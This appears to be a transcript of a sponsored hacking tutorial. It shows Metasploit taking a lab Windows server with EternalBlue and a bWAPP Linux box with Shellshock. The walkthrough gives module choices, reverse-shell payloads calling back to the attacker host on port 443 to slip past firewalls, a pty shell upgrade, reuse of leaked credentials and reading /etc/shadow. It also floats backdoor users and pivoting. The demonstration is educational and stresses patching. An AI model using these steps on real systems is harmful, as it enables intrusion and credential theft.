- And then we got the WIN. So we like WIN 'cause
guess what that means. We successfully attack the system. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more
like a Windows prompt and that's because that's
exactly what it is. So if I do like whoami I get nt system authority. I have full control over this machine. I am the administrator and it
was a point and click thing. And that's the power of Metasploit. If there is something like
this that's out there, I don't have to do the
hard work 'cause I've done EternalBlue attacks manually. That is a lot of work. The cat settings.php. Oh look, credentials. Now I go okay. So what can I do? Can I kind of work with that? Can I su to bee, and as for, okay bug. Oh, look, I've just
elevated my privileges. Now I'm the bee user so
if I do id or whoami, it tells me I'm bee, I'm no longer www-data. If I do sudo -l to list
my sudo privileges, I put in bug that's my password. It tells me I have full
sudo privileges here. So now I can sudo cat /etc/shadow, and there's all the password
hashes that's protected and only administrative
users can look at this. I have that capability. I have full control over
this machine at this point. (upbeat music) - Everyone David Bombal back
with Daniel from ITProTV. I really wanna thank ITProTV for sponsoring this video
series in a previous video which I've linked here and below, Daniel showed us how
to do a SQL injection. Daniel, what are you
gonna show us this time? - Well, today we're gonna
have a little bit of fun with my favorite closest
thing that you're probably gonna get to a 'point
and click' hacking tool which is known as the
Metasploit framework. Now, don't get this confused
with Metasploit Pro, that's a pay for money kind of thing. Metasploit framework is
a free for anybody to go and download and work with
and play with a framework and what that means is like, we have all sorts of
great exploits in here. You just have to point
it at the right target, give it the right options, and if everything goes to plan, you should be hacking away and having access to
something very, very shortly. So Metasploits, yeah. We'll short that down to Metasploit and that's what we're gonna look at today. - That's great. I mean, this is like
covering your favorite tools. So, this is one of your
favorite tools because? - It's one of my favorite tools because time is of the
essence a lot of times, and sometimes you don't
wanna spend all the time that it takes to hack something manually. You've done it. You know, like, Oh yeah,
I've seen this before. I just have to do X, Y, and Z, but X, Y and Z can take up a bit of time. Probably there's a
Metasploit module for that which means that there is an exploit built into Metasploit that all
you have to do is look for it and use it and fire and forget. And then it was easy. It took you much less time. So it's a big time saver plus it has a lot of
different functionality wrapped around it that you end up using in different ways. There's scanners that are
available inside of it. So if you're looking to
scan certain types of things you can kind of jump in
there and play with that. But if you're just looking for, I just wanna hack something I know this is a well-known vulnerability, I've found a website or a server or something on the internet that contains that vulnerability
to just fire up metasploit, give it the options and fire and forget and you should be having some access. So, I liked that aspect of it. Saved me some time, let me work on things that are actually making
me scratch my head and making me go, hmm, I feel like there's a way into this. And I just don't see it quite yet or I think it's like this and you're having to play with options. There's a lot of manual stuff
that can go into your day when you're working through, if you're doing like a CTF or if you're on a pen test itself, especially if you're doing
a pen testing engagement, you want to spend all your
time manually hacking things that you know you can do,
but take a lot of time. Just let Metasploit do it for you. So I liked that part it. - That's great. I mean, in this video, you
gonna show us how to hack. Is it a Windows box? Is that right? - Yeah. We're gonna have two boxes today. I'm gonna go for a Windows
box first, Windows server and the other one is going
to be a Linux server. So we're just gonna show
you how easy it can be. We'll take a little bit of set up again. Like I said, there's some
options, what do I mean by that is information
that we need to feed it. So it knows like, Oh,
that's the IP address of the target you would like to hack at? Where am I coming back to? If I was maybe giving you a
shell, how would that look? So you got to set a few options but they're very descriptive
and straightforward. So it shouldn't be too
big of a lift for us. - You know, I think we need
to just stay from the outset. You have downloaded VMs,
you're running this locally. You're not attacking a remote device. This is a penetration lab or testing lab that you running locally. Is that right? - Yes. Absolutely, I just
spun up I think the VM for Windows, I was running
like I had a 2008 R2 server ISO laying around. I said, "Okay, well, let's use that. "That's easy lift." And then the other one was
another one of these hacking playgrounds called the bWAPP, which is the broken web application. Something, something, I forget the... Actually I'm not great with acronyms, but it's another one of
those kind of prebuilt appliance type VMs that has
a broken web application, has a bunch of different
vulnerabilities to it. And one of them is gonna
be something we can exploit with metasploit. So we'll go after that, that way. - Yeah. I'll put links below for people to download some of the stuff, but Daniel without further ado, let's show us how it's done and then we'll get into the
weeds of what you actually did. - All right. I've got
an icon on my desktop but if you wanna fire up
from the console itself you can just type in msfconsole. That's mikesierrafoxconsole all one word lowercase, and it'll go but I'm just gonna click my
little icon that I've gotten in my task bar there. And that's going to fire up and if you're going, "Whoa,
Daniel, that is super small." You're absolutely right. I'll make it a little bit
bigger so we can all see it. I'm just gonna let it
fire up for a second. What it's doing right now is
just initializing the database of exploits and auxiliary
options that it does have. And once it's done, it'll drop
you to this little thing here and I'll just make this
look a little bit bigger. It's probably flashed the screen. It's a little weird, but there we go. And it always has some funny
ASCII art at the onset there. So this is not normal. Like it's not a part of the
program it's just for fun. The part of the program is right down here where it says msf5, that's what we wanna look at. So, what I'm gonna do is I'm
gonna try the tried-and-true well-known well executed and well adapted to crypto-ransomware,
goodness, known as WannaCry which was the EternalBlue
exploit that was released. You know, it was found from the NSA and released a few
years ago and you think, "Oh man, that's kind of old." It's funny. There are still areas in the world which are using older versions of Windows because they are pirated
versions and they can't update. So their infrastructure is
still maintained on that and they can't update it. So they're kind of stuck. What do they do? Well, they can get hacked if they leave it up on
attached to the internet. So it's still a viable thing. It's something that we
still see in the real world and in the live world today. So don't discount old EternalBlue it's still running around. So to find it, I just do a
search, type in the word search. Get my mouse out of the way and type in what I'm looking for. So this, in this case, it's eternalblue. And then that will return back anything that defines that
is related to eternalblue that it can think of based
off of your search term. So you can get a little crafty
with that if you need to, if you're looking for something specific, sometimes not everything
comes out very easy but this one does. And I have a few options. You'll notice I have the matching modules. And then this shows me numbers. It starts counting at zero. So number zero will be this one and then it has a description
right over here, MS17-010. And it tells me it's
EternalRomance, EternalSynergy, EternalChampion. These were the original
names for eternalblue before it kind of landed on that. So they're all kind of
doing the same thing just in vaguely different ways. But it also has this. This auxiliary/scanner/smb for MS17-010. That tells me that it
does a detection check for EternalBlue. Okay, well, let's start there. Let's do a scan and check for that vulnerability
against our machine. So if I do use and I give it the number, so I don't even have to
like copy and paste this. Normally you can just copy
and paste that in there, or you can type it in, but
now they've updated it. You can just use the number. So that's even easier, right? So I can just say, use 1. Bam. You'll notice my prompt has changed. It's a little bit small and I'll give you a little
more real state there. Plus, there we go. I can make sure you guys can see all this. There we go. And now I have jumped down
into that scanner for that. So all I could do now is
check what options it needs. So I'll just type in options
and here are the options. So because I've got to kind
of blow it up a little big it's kind of word wrap
and do some funky stuff but I'll walk you through this. So we've got check for the architecture. That setting is set to true tells me whether or not it's required and then gives me a
description of what that does. Checks for architecture
on vulnerable hosts. Okay, great. So, this is something it will check for even though it's not a required thing that's just a default, right? So you can kind of walk through this. What's important for us right now, well usually the main thing
you need to do is tell it what's the target. And typically that is through
this option right here RHOSTS or RHOST. The two main ways in which you
see that usually vetted out. So if you see RHOSTS or RHOST it's asking what is the remote host in which you wish to attack. And you can see that's right over here. The target host or hosts,
and you can put the range of the CIDR identifier and
also the good stuff, right? I think that's all I need here. It's already got the port set which is the right one which is 445. So I just set that. So sets rhosts and that
will be the IP of my server, which is 21. There we go. Set that-- - [David] Your Windows server, yeah? - Yeah, this is my Windows server. I can check the options again to make sure that that went through and we
can see now that has changed to the IP of that server. At that point, you can
type one or two things. If you want to be super
elite, you type exploits. So I wanna be super elite,
(David laughs) so I'm gonna type exploit. There we go. And we see that it
comes back very quickly. The host is likely vulnerable to MS17-010, and then it even gives me
that it is a Windows Server 2008 R2, suite. So, we've got a good information. Now, all we have to do is
gain that access, right? So I'm gonna search again for eternalblue. I can't type,
(Daniel chuckles) blue, there we go. And then I do have some options. I have some different options. Some may work, some may not work. This is sometimes where
it can be a bit of a trial and error thing. So you might just... Good news is there's not
many options for us here, so it wouldn't take as much time to kind of walk through each one of these if we were kind of
playing a guessing game. One of them right out of the GET tells me this is for Windows 8, right? Well, I'm not attacking Windows 8 box. So I can go ahead and disregard that. But what's another one that we have here, we've got this one is an exploit. And you'll notice that they
start with exploits, right? Exploit for Windows/smb,
and then gives the Microsoft equivalent of a CVE for
the actual vulnerability for their system. It even tells you like whether
or not it works very well. This is average, but for us this is gonna
be the one we want. Right? So the good news is out of the GET it was the first one that we needed. So I'm gonna do you use 2. So use 2 'cause that's the one we want. Our prompt has changed
and we need to go in here and check those options. Now that we've got those options up, you'll see that there's
RHOSTS right there. So obviously that's
something we need to give it. It did also kind of tell us right here, no payload is configured. The payload is once I attack this thing I can make it do whatever I want. What is it that you want me to make it do? So it's saying nothing is
configured and it's defaulting to this payload, which is a reverse shell. So send me back a command prompt so that I can control the machine. I don't wanna use the interpreter
when I'm gonna change it so that you can see that and kind of get some more information on how to use this, but it's
a pretty simple thing to do. All right. So let's start setting some stuff, and you'll notice that down here, the exploit target of
information is there as well. It tells me Windows 7 and
Windows server 2008 R2 (x64) Hey, isn't that the one we just found? It is.
(David laughs) Like it was planned, right? So let's see here. Let's set that rhosts. Rhosts, it used to be that
case sensitivity was a thing, but now it's not. Or I think it was, but now it's not. So you don't have to worry about that. And that is 10.10.10.21, all set. Good to go. What else do we need to set here? As far as the target goes,
I think that is it's. Now we need to set that payload. So I wanna change that payload. So I'm gonna say set payload and I wanna set it to something I wanted. Well, I know this is a Windows thing. If you're like, "Oh, you know what? "Payloads are available." You can kind of do like a list
payloads and they'll show you the ones that you can, oh I'm sorry. I think it's show payloads. Do a show payloads. There's a lot of payloads you can give it. So I'm not gonna bog us down with that. I already know the one I want. So Windows (x64)/nt shell_reverse_TCP. There we go. It didn't complain. So I must've chose something
that actually worked for this, go back to options and we can see now this has
been set under the payload. Now I have to do is set the LHOST which is the listening host. This is gonna be my attacking server so that knows where to
send that information to and what port to go on. So I'm gonna change the host and the port because the Windows box
doesn't know what 127.0.0.1 is other than itself. So that's not gonna work So we need to set lhost,
which will be my box, it's just 10. 10. 10. 10. And then I like to set my port. So lport to be something
that's probably gonna bypass any kind firewalling that might be. So 443 is a great one because you know a lot of times firewalls allow port 443. So if there was any firewall
blocking on something like 4444 I wouldn't
have an issue with this. I would still get my show. At this point, we are ready
to Script Kiddie it up and type the word exploits. Right?
(David laughs) Let's do that exploits all day long. All right. So this is all information wrapped around what it's doing. It's trying to just let you know whether or not it's being successful, what's happening and
what it's trying to do at that point in time. A lot of interesting things going on here. I do like how it says the
overwrite completed successfully, that makes me feel good about this attack. I have seen this kind of like, I'd have to do it over
and over and over again. It didn't just work. The first time I had to
be a little persistent. It will try to re-attack,
attack, attack over and over again. So sometimes that's the case. We are also working in virtualization. So when you're throwing
attacks like this at machines it can start to break things, right? Because it's not really, you know, machines aren't designed to be attacked. They're designed to work normally. So if it's messed up... So you can see this like
failed right out of the gate. Right? But that's okay 'cause it's trying again. It's gonna try something else and see, well maybe if we
try a little move in here. Oh, look at that. And then we got the WIN. So we like WIN 'cause
guess what that means? We've successfully attack the
system we're going on, okay? - [David] What do I do now? - It says, we won. What do we do? I'm gonna hit answer. Oh, there we go. Sometimes that happens. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more
like a Windows prompt. And that's because that's
exactly what it is. So if I do like whoami, I
get nt system authority. I have full control over this machine. I am the administrator. And it was a 'point and
click' thing, I mean hope it was pretty easy. It's at least as far as what
you guys saw on the other end. And that's the power of Metasploit. If there is something like
this that's out there. I don't have to do the
hard work 'cause I've done EternalBlue attacks manually
that is a lot of work. Actually ended up writing my
own EternalBlue attack script because I was like, man
I'm never gonna remember how to do all these things. I'll have to create a workflow. So lemme just create a script
that does it all for me. And then it was like, "Oh no dog. "You just got to go over to-- (chuckles) So use metasploit. It's got the module. Oh, that's right, Metasploit it's there. So it makes your life a whole lot easier for getting those low-hanging fruits without spending a lot
of time and effort on it. So there's a Windows machine against a system level
problem that it has. And we explore that. - You have admin access.
- Full admin access - You could load something on there so you could get back to
this later, but it was re-- - Oh yeah, I could upload malware here. I could create a backdoor user,
create a PowerShell script that does X, Y, or Z. I'm full control at this
point of this machine. I can turn on, like, if
it didn't have RDP enabled I could turn on RDP, create
a user, that's an admin user. And then log in using RDP and have my full Windows
graphical loveliness, all I want. Then I can do post exploitation things like grabbing password
hashes and cracking them so that I have other people's passwords. And maybe I can use those
passwords to gain access to other machines that don't have this. So, it's a great stepping stone. So once you find some
easy access such as this, it's just now that the tumblers
are gonna start to fall and I'm starting to work my way
through the network at large instead of just the one machine. - So, I mean, basically what
you did is you used Metasploit. That's just something
that you can download. And then,
- You're right. - And all you did is you
just followed some prompts you entered some very basic
information, IP address. I can't remember what else. It wasn't very much.
(chuckles) - It wasn't very much. - You basically just told
it which attack to launch. And I just wanted to emphasize this. If you hadn't used this, it
would have been a lot of work. Like you said to be able to
crack this, is that right? - Yeah, absolutely. Like I said, I've done it manually before and that is not the way to fly. This is so much easier. Now I have more control
over those manual options. It's easier for me to
make fine tune adjustments or things of that nature to
the stuff that I've done. But for the most part these scripts work right out of the box. We had one failure and then it went right away and said, "Oh yeah, we're good. "I've got it. "Here you go." And I just sat here and waited. That's all I had to do, was wait. I could have been running other scans and doing other things while
this is hacking stuff for me. So that automation of
doing things like that, making your workflow so much faster grabbing low hanging fruit that it's not gonna take you forever so that you can start to, well, you probably will need to, at that point pivot into I don't know if
they're using bad security like this running an old server systems that are unpatched, things
of that nature, then yeah. They're kinda getting
what they got coming. It's probably not gonna be too
easy to get through the rest of it either, but you do see that from time to time. Sometimes developers spin
up machines like this so that they can start
working on something because that's what they had available. - I heard of a very big company
that got hacked recently that had some server wasn't it
that SolarWinds or something? - Oh yeah, that's right.
(David laughs) Now, to their defense that
was a O'Day or a zero day exploit where some very smart
people found a very esoteric flaw, built a tool that exploits
that flaw and exploited it. So like, I don't wanna
throw SolarWinds too hard under the bus on that. Like there's no way they
could have prepared for that. They just didn't know that it was a flaw. Somebody found it, exploited it. They just happened to be
one of the biggest names in the industry and are hooked into some of the largest organizations such as the United States
Government and Military, which is what caused the problem. - So I mean, this work because there was a vulnerability or an exploit in a Microsoft
operating system that-- - Yeah. - And this is like you said, this is the reason why you
wanna patch your systems, yeah? - Exactly. This is why you wanna make sure you're doing the updates and
patching that comes through. Have a good patching cycle. Can't tell you how many
pen testers I've talked to. They're just like, man, if
they just had had a scheduled patching cycle where
they are applying patches in a systematic way, this
never would have happened. We never would've gotten this far or that attack wouldn't
have been successful or such and such and such, like it's
how many times I've heard that? I can't tell you. It's something as simple
as just making sure that you are updating and
patching your systems. - So, I've heard Linux is secure. I mean, you're hacking Windows but Linux can surely not be hacked. - Yeah, I hacked. That's absolutely not true.
(David laughs) I hack it all the time. Again. I wanna kind of give you that look, so I'm gonna use an older thing, but if you're not updating, it will still be available to you. And I just wanted, again,
more to showcase Metasploit than it was to show my
elite hacking skills. It was more about let's take a tour of Metasploit and how it
works and what it can do. So it was cool. We can see what it does with Windows. Let's go after something
completely different like Linux. Right. So let's do that. I'm gonna get out of my shell here. - [David] I mean, that's the point. I mean, this stuff happens all the time. - [Daniel] Right. - [David] I'm just showing
like a simple example for demonstration. Well, I mean, I shouldn't say simple. You showing an example
for demonstration purposes but I mean, this stuff
takes place all the time. - Absolutely. And then this
is just what I could think of immediately off the top of my head so I can come in here again and do this demonstrations. There are other vulnerabilities
that are much more current and recent that have Metasploit modules. So if I had that infrastructure set up we would have been able to demo that. That, that would have
just been a lot of lift to like build an
infrastructure that would allow for something like that. So I went with the easy button
so that we can take a look at Metasploit and what it can do. So I've got another server, Linux server and this time I'm gonna search
for seach for shellshock. I don't know if you
guys remember that one, but shellshock was a horrible bug that plagued the Linux operating system and went undiscovered
for many, many years. And once it was discovered, it was like, "Oh no, this no good." Because it gave you access
into people's systems and allowed you to, what's
called? Remote code execution. And I can execute code
from a remote location. It would do those things or commands. So that was bad. So my server, after I've done
all my pregame, like my recon and things, I've found
that it's running apache, it's got a web server going. I found the CGI bin area, which
is where you're looking for. If you're looking for shellshock. And then I went to Metasploit and I found this one right here which looked to fit my bill very nicely. Right? So it's going after apache under the mod_cgi_bash environment. Oh, everything (smooch)
looking for that exactly. Now I did some testing. You can also find some testers, I think there's a auxiliary scanner. Yeah. So first specific one DHC clients. Oh, here's one for apache multi. So you could have scan
for it using this as well. I just did my own recon on that. And there we go. I know exactly where I
want to attack this thing so I know what options to set. Right? That's the options. So for this one, it's
going to be, let's see. Let's take a look at the options and we're gonna use 5 that's right. Use 5. Now look at those options. And we have a few let's see here. Now we are gonna set a bit more options than we did where well,
I had to set the host and then set that payload correctly. Right? But let's take a look. Some of the things that we
do need, like the header, that's gonna go out. These are the HTTP
headers that you wanna use as it says right there. And if you need to change
that to like a post method, but GET is the one we're gonna use. So that's fine that that's the default. I do need to change that. I'm not gonna use User-Agent. I wanna set that to the referrer header which is where I found the vulnerability in this application. So I need to do that. Let's do that, we have the get set header which will be referer. So options again just
to make sure that's set. I'm super anal about making sure everything got set the way I wanted it to because I have made typos in the past. And you're like, "Why isn't this working?" So typos can definitely kill
your game really quickly. I don't know how many proxies. I do have an RHOST though. Right? There it is right there. So let's set that. Set rhosts, which is
10.10.10.17 for this server. All right. Show me those options. And let's see here, there it is. Set that well, great. It's over port 80, so that's fine. I think that's all good. Our path, that's fine as well. Don't need any of this. It looks like our target. Oh, we got one more thing. Targeturi. This is the actual path to the script that we're gonna exploit that I have found using Burp Suite. And again, once we get to the Burp Suite, sure you'll be like, "Man,
he's got all this information. "Where does he get it from?" Burp Suite. Right. So we'll have some
fun with some Burp Suite coming up very shortly. Not today, but in another one. All right. So let's set that targeturi. So set, targeturi which
if I remember is BWAPP that's then cgi-bin/shellshock.sh. Okay, now that I've got this set the last thing I have
to do is set our payload which is this person right here. Right? And I'll just stick
with the default on that. We don't need to fiddle around with it. So sets lhosts of 10. 10. 10.
10 which is my Kali server. That's the local hosts or
the listening host, right? With that I'll leave the port. What the heck? I know that's should be fine. And I will hit exploits
because it is time to exploits. Oh yes. The session has opened, right? 'Cause it says right there,
interpreter two has opened. So this is using the built
in session management, shell management that
Metasploit has available. It's a very handy thing as well. Just depending on what you're attacking you might wanna go with one or the other but I can just type in shell. And then this is one channel created id. Hey, look at that, host name like that. You do the same on the bee-box. If I wanna pretty this up, I
can throw some Python at it. Let's see here, import a
nice pty shell of bash. So pty.spawn and throw this in there /bins/bash. Bam, bam. And now, Oh, it didn't like it. You're right. Yeah. Import pty. (chuckles) Okay. That's right. That was absolutely wrong. Lemme try that again, python -c import. Why am I doing that? Import pty and then there's
what I'm looking for. Pty.spawn. P-A-W-N. I'm the world's worst typist. - [David] Don't worry.
(Daniel chuckles) - /bin/bash. There we go. Let's try that. And then you see, I get a nice like regular looking Linux prompt. It's just one way to make that happen but that's the one I typically used. But now I'm in the system, I can start doing things. No ls, here's the file I can do pwd, start looking for ways
to elevate my privileges inside the machine. If anything shows itself and greats, I grabbed the mountaintop. I start doing post exploitation
type of information, grabbing password hashes,
doing the cracking thing on the back end, looking for pivoting all of the good stuff. But as you saw, it wasn't that difficult. Throwing some options. - You got root in that device, did you? - No, I'm actually logged
in with the service account. As you can see, if I do id, I'm actually logged in with
the service account of apache, which is www-data. - Oh yes, you we're
tackling an apache script, is that right? - That's exactly right. And since it was running with the permissions
of that service account that's the account we
got when it ran the code to give me a shell back to a Metasploit. - But the point is you
managed to get a shell on a remote machine by
exploiting a vulnerability in apache or something.
- Yeah. And from here, you just like I said, you start doing other stuff, right? So where are we? Cgi-bin Let's get out of there. Let's go to cd/var/www, take a look in there. And you'll notice we've
got the bee-cd bWAPP. And then here is the
actual web application, all the PHP pages that make it up. I can start looking at things
like there's an admin folder. I wonder what's in that. Let's go there. Cd/admin, ls, CD slash
oh, it's not slash admin. It's just admin.
(chuckles) Ls there. And I've got like a settings
of what if I cat settings.php. Oh, look credentials. Now I go okay. So what can I do? Can I work with that? Can I su to bee? And as for okay, bug. Oh, look, I've just
elevated my privileges. now I'm the bee user. So if I do id or whoami, It tells me I'm bee, I'm no longer www-data. If I do Sudo -l to list
my sudo privileges, I put in bug, that's my password. It tells me I have full
sudo privileges here. So now I can Sudo cat/etc/shadow. And there's all the password
hashes that's protected. And only administrative
users can look at this. I have that capability. I have full control of
this machine at this point. - So yeah, you've just
shown us how to get root or administrator on
Windows and root privileges on a Linux box. - Yes. Well, at least one way. - Yeah, one way. But I mean, it's really cool. I mean, it wasn't that difficult. - No. If you know what to do, if you're familiar with these things and you just start looking around and you never know what you'll find. - So I mean, let's step back now and discuss what we've done. - Yeah. - So this is Metasploit
and this is an application that you just download from
the internet, it's free. Yeah.
- Oh yeah. It's totally free. The Metasploit framework,
Metasploit pro is some money, that costs a bit of the Do-Re-Mi, but Metasploit framework, you should be able to just install. So if you're running something like Ubuntu or Mint or some other red
hat or something like that with Ubuntu and Debbie and Variations it would be an app yet
a way of installation. If you don't have it, you're running Kali. I think pretty sure it comes pre-installed and you're off to the races. Use just msfconsole and it fires it right up
and you're ready to go. - Yeah. So men, all you
had to do top that command then you'd be at the point
that you demonstrated. And then it's literally just
tapping these few commands that you demonstrated. - That's it. That's it. - So it's not very difficult. So, I mean, I know Script
Kiddie is that kind of thing is kind of frowned upon
in the cybersecurity space but tools like this, are they
useful for professionals? - Absolutely, they're
useful in professionals. They're probably not
using the free versions of these kinds of tools. They're probably using
the professional versions of these kinds of tools which have more functionality,
more customability, right? So you can customize them, customizability, I
guess is the right word. You customize them in a way that works and you can make them make
changes a whole lot easier. Not that you can't customize
this, you absolutely can. But if you're a professional, you will be going with the pro versions of these types of tools. So like Cobalt Strike and Metasploit, that's another one that's a really high professional grade tool that's very similar to
what we're seeing here but has some graphical
options to them as well, so does Metasploit pro it
has a nice graphical option to mess around with, but if you do wanna
play with some graphics you want more of a gooey
experience with Metasploit, you can use Armatage, which is free. It's kind of like a graphical
front end that wraps around Metasploit and
it can be really useful. Plus it's really cool looking. I actually like using it because it gives you some
some pretty neat options and you can point and click or stuff. So if you want that just go with Armatage, get that installed. You're ready to go. - That's great Daniel. I mean, just give us a teaser. What other tools or things
are you gonna show us in upcoming videos? - Yeah, you know I'm sitting here looking at these password hashes and I'm thinking, "Hey, let's do some password cracking." That'd be a good one. That's something that is a good
skill to have and understand and know and see how that works. So I typically revert to
the easiest one available which is John the Ripper
because it does a great job. There are others available, but John the Ripper would
probably smoke there at least a couple of these things. And maybe we can find some passwords. We can grab some Windows password, see if we can break those as well. And just see how John the Ripper works. We'll play around with that. Obviously we've been
talking about Burp Suite. We'll have to do a (speaking
in foreign language) of Burp Suite,
(David laughs) kind of go through some
of the more common options and things that you can do with Burp Suite and see why
is that such a popular tool because it is, and for good reason. So we'll do that as well. - Yeah. I'm looking forward to it, Daniel. Thanks so much for sharing your knowledge with us and big thanks to
ITProTV for sponsoring this, but Daniel, thanks very much. - Hey, no problem, man. Thanks for having me. (upbeat music)